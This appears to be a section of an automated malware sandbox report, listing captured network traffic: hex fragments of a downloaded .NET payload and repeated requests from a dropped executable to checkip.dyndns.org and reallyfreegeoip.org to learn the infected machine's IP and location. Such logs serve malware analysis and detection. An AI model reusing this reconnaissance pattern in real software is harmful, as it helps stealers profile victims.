Oct 30, 2024 08:25:03.736452103 CET	1236	IN	Data Raw: 02 73 7a 00 00 0a 7d 11 00 00 04 02 73 7e 00 00 0a 7d 12 00 00 04 02 73 7b 00 00 0a 7d 13 00 00 04 02 73 7b 00 00 0a 7d 14 00 00 04 02 73 7f 00 00 0a 7d 15 00 00 04 02 73 80 00 00 0a 7d 16 00 00 04 02 73 7b 00 00 0a 7d 17 00 00 04 02 73 80 00 00 Data Ascii: sz}s~}s{}s{}s}s}s{}s}s}s{}s}s{}s{}({M Bs/o{so{rcpo{ ;so{
Oct 30, 2024 08:25:03.736463070 CET	212	IN	Data Raw: 00 04 17 6f 89 00 00 0a 00 02 7b 11 00 00 04 02 fe 06 23 00 00 06 73 8a 00 00 0a 6f 8b 00 00 0a 00 02 7b 12 00 00 04 72 9b 03 00 70 6f 8f 00 00 0a 00 02 7b 12 00 00 04 16 6f 90 00 00 0a 00 02 7b 12 00 00 04 02 fe 06 22 00 00 06 73 8a 00 00 0a 6f Data Ascii: o{#so{rpo{o{"so{o{ %)s/o{so{rpo{ so{o{rupo
Oct 30, 2024 08:25:03.736474037 CET	1236	IN	Data Raw: 39 00 00 0a 00 02 7b 14 00 00 04 17 6f 8c 00 00 0a 00 02 7b 14 00 00 04 20 75 02 00 00 20 81 00 00 00 73 2f 00 00 0a 6f 82 00 00 0a 00 02 7b 14 00 00 04 1e 16 1e 16 73 83 00 00 0a 6f 84 00 00 0a 00 02 7b 14 00 00 04 72 bd 03 00 70 6f 85 00 00 0a Data Ascii: 9{o{ u s/o{so{rpo{ so{o{rpo9{o{o{o{o{M s/o{so{r
Oct 30, 2024 08:25:03.736486912 CET	212	IN	Data Raw: 6f 39 00 00 0a 00 02 7b 1d 00 00 04 17 6f 8c 00 00 0a 00 02 7b 1d 00 00 04 28 a0 00 00 0a 6f a1 00 00 0a 00 02 7b 1d 00 00 04 20 75 02 00 00 20 4f 03 00 00 73 2f 00 00 0a 6f 82 00 00 0a 00 02 7b 1d 00 00 04 1e 16 1e 16 73 83 00 00 0a 6f 84 00 00 Data Ascii: o9{o{(o{ u Os/o{so{r}po{ _ so{o{rpo9"A"As(( s((
Oct 30, 2024 08:25:03.736500978 CET	1236	IN	Data Raw: 00 0a 02 7b 1d 00 00 04 6f a7 00 00 0a 00 02 28 a6 00 00 0a 02 7b 1b 00 00 04 6f a7 00 00 0a 00 02 28 a6 00 00 0a 02 7b 1c 00 00 04 6f a7 00 00 0a 00 02 28 a6 00 00 0a 02 7b 19 00 00 04 6f a7 00 00 0a 00 02 28 a6 00 00 0a 02 7b 1a 00 00 04 6f a7 Data Ascii: {o({o({o({o({o({o({o({o({o({o({o({o({o({o
Oct 30, 2024 08:25:03.736514091 CET	1236	IN	Data Raw: bb 00 00 0a d0 08 00 00 01 28 27 00 00 0a 16 6f bc 00 00 0a 0a 06 8e 16 fe 01 0b 07 2c 09 00 72 61 00 00 70 0c 2b 10 06 16 9a 74 08 00 00 01 6f c5 00 00 0a 0c 2b 00 08 2a 00 13 30 02 00 2b 00 00 00 0e 00 00 11 00 03 2c 0b 02 7b 1e 00 00 04 14 fe Data Ascii: ('o,rap+to+0+,{+,{ot(x0('sys}s} s{}!s{}"s}#sz}${o{ o({
Oct 30, 2024 08:25:03.741626978 CET	1236	IN	Data Raw: 00 04 20 23 01 00 00 20 3b 01 00 00 73 2f 00 00 0a 6f 82 00 00 0a 00 02 7b 23 00 00 04 1f 10 1d 1e 1d 73 83 00 00 0a 6f 84 00 00 0a 00 02 7b 23 00 00 04 17 6f 9c 00 00 0a 00 02 7b 23 00 00 04 72 e9 05 00 70 6f 85 00 00 0a 00 02 7b 23 00 00 04 17 Data Ascii: # ;s/o{#so{#o{#rpo{#o{#o{# vso{#o{#o{#rpo9{$o{$o{$ t s/o{$so

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49164	193.122.6.168	80	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 08:25:12.600608110 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 30, 2024 08:25:14.241584063 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:13 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7971c08c91d64686579e0d76aac1a083 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:25:14.242526054 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:13 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7971c08c91d64686579e0d76aac1a083 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:25:14.242892027 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:13 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7971c08c91d64686579e0d76aac1a083 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:25:14.488867044 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 30, 2024 08:25:15.735416889 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:15 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cfd04fb8a2f327844ddc91e8858015dc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:25:15.950253963 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:15 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cfd04fb8a2f327844ddc91e8858015dc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:25:17.602246046 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 30, 2024 08:25:19.084317923 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:18 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 36b732f88f3c508ffad04c33c7b67164 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:25:19.302359104 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:18 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 36b732f88f3c508ffad04c33c7b67164 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49167	193.122.6.168	80	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 08:25:19.908701897 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 30, 2024 08:25:20.745129108 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ee8f33beda4621317257d1440c2d3e6b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:25:20.954159021 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ee8f33beda4621317257d1440c2d3e6b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49169	158.101.44.242	80	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 08:25:21.604711056 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 30, 2024 08:25:27.213723898 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:27 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1c888919965f0273818da57bbf37d9df Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49171	193.122.6.168	80	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 08:25:28.033581018 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 30, 2024 08:25:29.868801117 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:29 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d24e7e37cc3e940b55781e538db32151 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:25:30.078218937 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:29 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d24e7e37cc3e940b55781e538db32151 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49173	132.226.247.73	80	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 08:25:30.742863894 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 30, 2024 08:25:33.616075039 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:33 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 55b16481de9d15d6273226d8563efa38 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:25:33.826214075 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:33 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 55b16481de9d15d6273226d8563efa38 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49175	193.122.130.0	80	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 08:25:34.716197968 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 30, 2024 08:25:36.613683939 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:36 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8f5391b67a790dae941e3561bb7151f2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:25:36.822176933 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:36 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8f5391b67a790dae941e3561bb7151f2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49177	193.122.6.168	80	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 08:25:38.509279966 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 30, 2024 08:25:39.341414928 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:39 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b3c3a47a3d50152d917ca461a780e3e2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:25:39.550225019 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:39 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b3c3a47a3d50152d917ca461a780e3e2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49179	132.226.8.169	80	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 08:25:41.402996063 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 30, 2024 08:25:42.309554100 CET	275	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:42 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:25:42.518166065 CET	275	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:42 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49165	188.114.96.3	443	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 07:25:17 UTC	87	OUT	GET /xml/173.254.250.78 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-30 07:25:17 UTC	889	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:17 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AcLvmhW3vHcESEw= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21140 Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ovH39IH6AP0KU2qDy0EZiopN%2B%2BVfWEbxsrj55Dykn%2Bp15gBIVpgaTHifDzLtOCwf2O43aztvjoaM9cxL1DxWcH7vbpr%2BbOex8eaa%2BkG9o5sApq9zm0LJcdqhZUgOg06RxumbuG9l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da9aba83b9ce922-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1065&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2601976&cwnd=242&unsent_bytes=0&cid=cd4c1a6adb1a98ca&ts=242&x=0"
2024-10-30 07:25:17 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49166	188.114.96.3	443	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 07:25:19 UTC	63	OUT	GET /xml/173.254.250.78 HTTP/1.1 Host: reallyfreegeoip.org
